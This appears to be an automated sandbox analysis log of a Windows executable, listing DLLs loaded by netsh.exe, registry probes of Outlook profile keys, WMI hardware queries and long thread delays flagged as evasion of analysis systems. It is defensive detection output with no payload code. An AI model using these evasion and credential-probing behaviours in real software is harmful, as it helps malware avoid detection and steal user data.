          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: 73ybGtnYXx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 73ybGtnYXx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: 73ybGtnYXx.exeStatic PE information: 0xE7D68599 [Fri Apr 3 11:16:41 2093 UTC]
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936AB3FBB push ebx; iretd 0_2_00007FF936AB400A
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeCode function: 0_2_00007FF936AB403D push ebx; iretd 0_2_00007FF936AB400A

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 60233 -> 9000
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeMemory allocated: 1B60E120000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeMemory allocated: 1B627C00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599563Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599344Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599120Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599016Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598797Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598469Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598250Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598141Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597922Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597813Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597484Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597375Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597266Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597156Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 597047Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596938Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596813Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596688Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596563Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596344Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596219Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596109Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 596000Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 595891Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 595781Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 595672Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 595562Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeWindow / User API: threadDelayed 3401Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeWindow / User API: threadDelayed 6449Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -21213755684765971s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -599891s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -599672s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -599563s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -599344s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -599234s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -599120s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -599016s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -598906s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -598797s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -598687s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -598578s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -598469s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -598359s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -598250s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -598141s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -598031s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -597922s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -597813s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -597703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -597594s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -597484s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -597375s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -597266s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -597156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -597047s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -596938s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -596813s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -596688s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -596563s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -596453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -596344s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -596219s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -596109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -596000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -595891s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -595781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -595672s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588Thread sleep time: -595562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599563Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599344Jump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeThread delayed: delay time: 599234Jump to behavior
